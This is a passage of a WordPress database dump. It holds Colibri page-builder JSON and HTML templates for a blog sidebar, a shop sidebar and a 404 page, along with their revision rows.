15:45:51','{\"name\":\"hop-sidebar\",\"id\":\"43-s1\",\"partialId\":43,\"styleRef\":160,\"type\":\"sidebar\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"43-s15\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":164,\"type\":\"sidebar\"},{\"name\":\"hop-text\",\"id\":\"43-s16\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":165,\"type\":\"sidebar\"}],\"id\":\"43-s14\",\"parentId\":\"43-s13\",\"partialId\":43,\"styleRef\":163,\"type\":\"sidebar\"}],\"id\":\"43-s13\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":162,\"type\":\"sidebar\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"43-s4\",\"parentId\":\"43-s3\",\"partialId\":43,\"children\":[{\"name\":\"hop-widget-area\",\"props\":{\"widgetAreaId\":\"sidebar-1\"},\"id\":\"43-s5\",\"parentId\":\"43-s4\",\"partialId\":43,\"children\":[{\"name\":\"hop-search-widget\",\"id\":\"43-s6\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":169,\"type\":\"sidebar\",\"props\":{\"stateButton\":\"\",\"showButton\":true,\"showPlaceholder\":true,\"stateInput\":\"\",\"showIconButton\":true}},{\"name\":\"hop-recent-post-widget\",\"id\":\"43-s7\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":170,\"type\":\"sidebar\"},{\"name\":\"hop-recent-comments-widget\",\"id\":\"43-s8\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":171,\"type\":\"sidebar\"},{\"name\":\"hop-archives-widget\",\"id\":\"43-s9\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":172,\"type\":\"sidebar\"},{\"name\":\"hop-categories-widget\",\"id\":\"43-s10\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":173,\"type\":\"sidebar\"},{\"name\":\"hop-meta-widget\",\"id\":\"43-s11\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":174,\"type\":\"sidebar\"},{\"name\":\"hop-text-widget\",\"id\":\"43-s12\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":175,\"type\":\"sidebar\"}],\"styleRef\":168,\"type\":\"sidebar\"}],\"styleRef\":167,\"type\":\"sidebar\"}],\"id\":\"43-s3\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":166,\"type\":\"sidebar\"}],\"parentId\":\"43-s1\",\"type\":\"sidebar\",\"props\":{\"anchor\":false,\"name\":\"Blog Sidebar\",\"attrs\":{\"id\":\"blog-sidebar\"}},\"id\":\"43-s2\",\"partialId\":43,\"styleRef\":161}]}','','','publish','closed','closed','','44','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=44',0,'extb_post_json','',0),(45,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"43-s1\" class=\"style-160 style-local-43-s1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"43-s2\" id=\"blog-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-161 style-local-43-s2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"43-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-166 style-local-43-s3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-167-outer style-local-43-s4-outer\">\n            <div data-colibri-id=\"43-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-167 style-local-43-s4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"43-s5\" class=\"h-widget-area style-168 style-local-43-s5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all widget-shortcode\">[colibri_widget_area id=\"sidebar-1\"]</div>\n                  <div data-colibri-id=\"43-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','sidebar_post','','inherit','closed','closed','','43-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',43,'https://gsudice.dataconn.net/?p=45',0,'revision','',0),(46,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div disabled-ui=\"true\" data-colibri-id=\"46-s1\" class=\"style-176 style-local-46-s1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"46-s2\" id=\"product-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-177 style-local-46-s2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"46-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-182 style-local-46-s3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-183-outer style-local-46-s4-outer\">\n            <div data-colibri-id=\"46-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-183 style-local-46-s4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-component=\"widget-area\" data-colibri-id=\"46-s5\" class=\"h-widget-area style-184 style-local-46-s5 position-relative h-element\">\n                  <!---->\n                  <div class=\"widget-shortcode h-global-transition-all\">[colibri_widget_area id=\"ecommerce-left\"]</div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','sidebar_product','','publish','closed','closed','','46','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',0,'https://gsudice.dataconn.net/?post_type=extb_post_sidebar&#038;p=46',0,'extb_post_sidebar','',0),(47,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-sidebar\",\"id\":\"46-s1\",\"partialId\":46,\"styleRef\":176,\"type\":\"sidebar\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"46-s15\",\"parentId\":\"46-s14\",\"partialId\":46,\"styleRef\":180,\"type\":\"sidebar\"},{\"name\":\"hop-text\",\"id\":\"46-s16\",\"parentId\":\"46-s14\",\"partialId\":46,\"styleRef\":181,\"type\":\"sidebar\"}],\"id\":\"46-s14\",\"parentId\":\"46-s13\",\"partialId\":46,\"styleRef\":179,\"type\":\"sidebar\"}],\"id\":\"46-s13\",\"parentId\":\"46-s2\",\"partialId\":46,\"styleRef\":178,\"type\":\"sidebar\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"46-s4\",\"parentId\":\"46-s3\",\"partialId\":46,\"children\":[{\"name\":\"hop-widget-area\",\"props\":{\"widgetAreaId\":\"ecommerce-left\"},\"id\":\"46-s5\",\"parentId\":\"46-s4\",\"partialId\":46,\"children\":[{\"name\":\"hop-search-widget\",\"id\":\"46-s6\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":185,\"type\":\"sidebar\",\"props\":{\"stateButton\":\"\",\"showButton\":true,\"showPlaceholder\":true,\"stateInput\":\"\",\"showIconButton\":true}},{\"name\":\"hop-recent-post-widget\",\"id\":\"46-s7\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":186,\"type\":\"sidebar\"},{\"name\":\"hop-recent-comments-widget\",\"id\":\"46-s8\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":187,\"type\":\"sidebar\"},{\"name\":\"hop-archives-widget\",\"id\":\"46-s9\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":188,\"type\":\"sidebar\"},{\"name\":\"hop-categories-widget\",\"id\":\"46-s10\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":189,\"type\":\"sidebar\"},{\"name\":\"hop-meta-widget\",\"id\":\"46-s11\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":190,\"type\":\"sidebar\"},{\"name\":\"hop-text-widget\",\"id\":\"46-s12\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":191,\"type\":\"sidebar\"}],\"styleRef\":184,\"type\":\"sidebar\"}],\"styleRef\":183,\"type\":\"sidebar\"}],\"id\":\"46-s3\",\"parentId\":\"46-s2\",\"partialId\":46,\"styleRef\":182,\"type\":\"sidebar\"}],\"parentId\":\"46-s1\",\"type\":\"sidebar\",\"props\":{\"anchor\":false,\"name\":\" Woo Sidebar\",\"attrs\":{\"id\":\"product-sidebar\"}},\"id\":\"46-s2\",\"partialId\":46,\"styleRef\":177}]}','','','publish','closed','closed','','47','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&#038;p=47',0,'extb_post_json','',0),(48,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"46-s1\" class=\"style-176 style-local-46-s1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"46-s2\" id=\"product-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-177 style-local-46-s2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"46-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-182 style-local-46-s3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-183-outer style-local-46-s4-outer\">\n            <div data-colibri-id=\"46-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-183 style-local-46-s4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"46-s5\" class=\"h-widget-area style-184 style-local-46-s5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all widget-shortcode\">[colibri_widget_area id=\"ecommerce-left\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>','sidebar_product','','inherit','closed','closed','','46-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',46,'https://gsudice.dataconn.net/?p=48',0,'revision','',0),(49,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-sidebar\",\"id\":\"43-s1\",\"partialId\":43,\"styleRef\":160,\"type\":\"sidebar\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"43-s15\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":164,\"type\":\"sidebar\"},{\"name\":\"hop-text\",\"id\":\"43-s16\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":165,\"type\":\"sidebar\"}],\"id\":\"43-s14\",\"parentId\":\"43-s13\",\"partialId\":43,\"styleRef\":163,\"type\":\"sidebar\"}],\"id\":\"43-s13\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":162,\"type\":\"sidebar\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"43-s4\",\"parentId\":\"43-s3\",\"partialId\":43,\"children\":[{\"name\":\"hop-widget-area\",\"props\":{\"widgetAreaId\":\"sidebar-1\"},\"id\":\"43-s5\",\"parentId\":\"43-s4\",\"partialId\":43,\"children\":[{\"name\":\"hop-search-widget\",\"id\":\"43-s6\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":169,\"type\":\"sidebar\",\"props\":{\"stateButton\":\"\",\"showButton\":true,\"showPlaceholder\":true,\"stateInput\":\"\",\"showIconButton\":true}},{\"name\":\"hop-recent-post-widget\",\"id\":\"43-s7\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":170,\"type\":\"sidebar\"},{\"name\":\"hop-recent-comments-widget\",\"id\":\"43-s8\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":171,\"type\":\"sidebar\"},{\"name\":\"hop-archives-widget\",\"id\":\"43-s9\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":172,\"type\":\"sidebar\"},{\"name\":\"hop-categories-widget\",\"id\":\"43-s10\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":173,\"type\":\"sidebar\"},{\"name\":\"hop-meta-widget\",\"id\":\"43-s11\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":174,\"type\":\"sidebar\"},{\"name\":\"hop-text-widget\",\"id\":\"43-s12\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":175,\"type\":\"sidebar\"}],\"styleRef\":168,\"type\":\"sidebar\"}],\"styleRef\":167,\"type\":\"sidebar\"}],\"id\":\"43-s3\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":166,\"type\":\"sidebar\"}],\"parentId\":\"43-s1\",\"type\":\"sidebar\",\"props\":{\"anchor\":false,\"name\":\"Blog Sidebar\",\"attrs\":{\"id\":\"blog-sidebar\"}},\"id\":\"43-s2\",\"partialId\":43,\"styleRef\":161}]}','','','inherit','closed','closed','','44-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',44,'https://gsudice.dataconn.net/?p=49',0,'revision','',0),(50,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"43-s1\" class=\"style-160 style-local-43-s1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"43-s2\" id=\"blog-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-161 style-local-43-s2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"43-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-166 style-local-43-s3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-167-outer style-local-43-s4-outer\">\n            <div data-colibri-id=\"43-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-167 style-local-43-s4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"43-s5\" class=\"h-widget-area style-168 style-local-43-s5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all widget-shortcode\">[colibri_widget_area id=\"sidebar-1\"]</div>\n                  <div data-colibri-id=\"43-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-colibri-id=\"43-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','sidebar_post','','inherit','closed','closed','','43-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',43,'https://gsudice.dataconn.net/?p=50',0,'revision','',0),(51,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-sidebar\",\"id\":\"46-s1\",\"partialId\":46,\"styleRef\":176,\"type\":\"sidebar\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"46-s15\",\"parentId\":\"46-s14\",\"partialId\":46,\"styleRef\":180,\"type\":\"sidebar\"},{\"name\":\"hop-text\",\"id\":\"46-s16\",\"parentId\":\"46-s14\",\"partialId\":46,\"styleRef\":181,\"type\":\"sidebar\"}],\"id\":\"46-s14\",\"parentId\":\"46-s13\",\"partialId\":46,\"styleRef\":179,\"type\":\"sidebar\"}],\"id\":\"46-s13\",\"parentId\":\"46-s2\",\"partialId\":46,\"styleRef\":178,\"type\":\"sidebar\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"46-s4\",\"parentId\":\"46-s3\",\"partialId\":46,\"children\":[{\"name\":\"hop-widget-area\",\"props\":{\"widgetAreaId\":\"ecommerce-left\"},\"id\":\"46-s5\",\"parentId\":\"46-s4\",\"partialId\":46,\"children\":[{\"name\":\"hop-search-widget\",\"id\":\"46-s6\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":185,\"type\":\"sidebar\",\"props\":{\"stateButton\":\"\",\"showButton\":true,\"showPlaceholder\":true,\"stateInput\":\"\",\"showIconButton\":true}},{\"name\":\"hop-recent-post-widget\",\"id\":\"46-s7\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":186,\"type\":\"sidebar\"},{\"name\":\"hop-recent-comments-widget\",\"id\":\"46-s8\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":187,\"type\":\"sidebar\"},{\"name\":\"hop-archives-widget\",\"id\":\"46-s9\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":188,\"type\":\"sidebar\"},{\"name\":\"hop-categories-widget\",\"id\":\"46-s10\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":189,\"type\":\"sidebar\"},{\"name\":\"hop-meta-widget\",\"id\":\"46-s11\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":190,\"type\":\"sidebar\"},{\"name\":\"hop-text-widget\",\"id\":\"46-s12\",\"parentId\":\"46-s5\",\"partialId\":46,\"styleRef\":191,\"type\":\"sidebar\"}],\"styleRef\":184,\"type\":\"sidebar\"}],\"styleRef\":183,\"type\":\"sidebar\"}],\"id\":\"46-s3\",\"parentId\":\"46-s2\",\"partialId\":46,\"styleRef\":182,\"type\":\"sidebar\"}],\"parentId\":\"46-s1\",\"type\":\"sidebar\",\"props\":{\"anchor\":false,\"name\":\" Woo Sidebar\",\"attrs\":{\"id\":\"product-sidebar\"}},\"id\":\"46-s2\",\"partialId\":46,\"styleRef\":177}]}','','','inherit','closed','closed','','47-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',47,'https://gsudice.dataconn.net/?p=51',0,'revision','',0),(52,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"46-s1\" class=\"style-176 style-local-46-s1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"46-s2\" id=\"product-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-177 style-local-46-s2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"46-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-182 style-local-46-s3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-183-outer style-local-46-s4-outer\">\n            <div data-colibri-id=\"46-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-183 style-local-46-s4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"46-s5\" class=\"h-widget-area style-184 style-local-46-s5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all widget-shortcode\">[colibri_widget_area id=\"ecommerce-left\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>','sidebar_product','','inherit','closed','closed','','46-revision-v1','','','2022-02-15 15:45:51','2022-02-15 15:45:51','',46,'https://gsudice.dataconn.net/?p=52',0,'revision','',0),(59,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":0,\"id\":\"37-m4\",\"partialId\":37,\"styleRef\":134,\"type\":\"main\",\"props\":{\"content\":\"404\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":1,\"id\":\"37-m5\",\"partialId\":37,\"styleRef\":135,\"type\":\"main\",\"props\":{\"content\":\"<p>Sorry, page not found!<\\/p>\"}},{\"name\":\"hop-home-button-group\",\"children\":[{\"name\":\"hop-home-button\",\"props\":{\"text\":\"Go to Homepage!\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"37-m7\",\"parentId\":\"37-m6\",\"partialId\":37,\"styleRef\":137,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"37-m3\",\"index\":2,\"id\":\"37-m6\",\"partialId\":37,\"styleRef\":136,\"type\":\"main\"}],\"id\":\"37-m3\",\"parentId\":\"37-m2\",\"partialId\":37,\"styleRef\":133,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}}}],\"id\":\"37-m2\",\"parentId\":\"37-m1\",\"partialId\":37,\"styleRef\":132,\"type\":\"main\",\"props\":{\"name\":\"Nothing found\",\"attrs\":{\"id\":\"nothing-found\"}}}],\"id\":\"37-m1\",\"partialId\":37,\"styleRef\":131,\"type\":\"main\"}','','','inherit','closed','closed','','38-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',38,'https://gsudice.dataconn.net/?p=59',0,'revision','',0),(60,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"37-m1\" class=\"style-131 style-local-37-m1 position-relative\">\n  <!---->\n  <div data-colibri-id=\"37-m2\" id=\"nothing-found\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-132 style-local-37-m2 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-133-outer style-local-37-m3-outer\">\n        <div data-colibri-id=\"37-m3\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 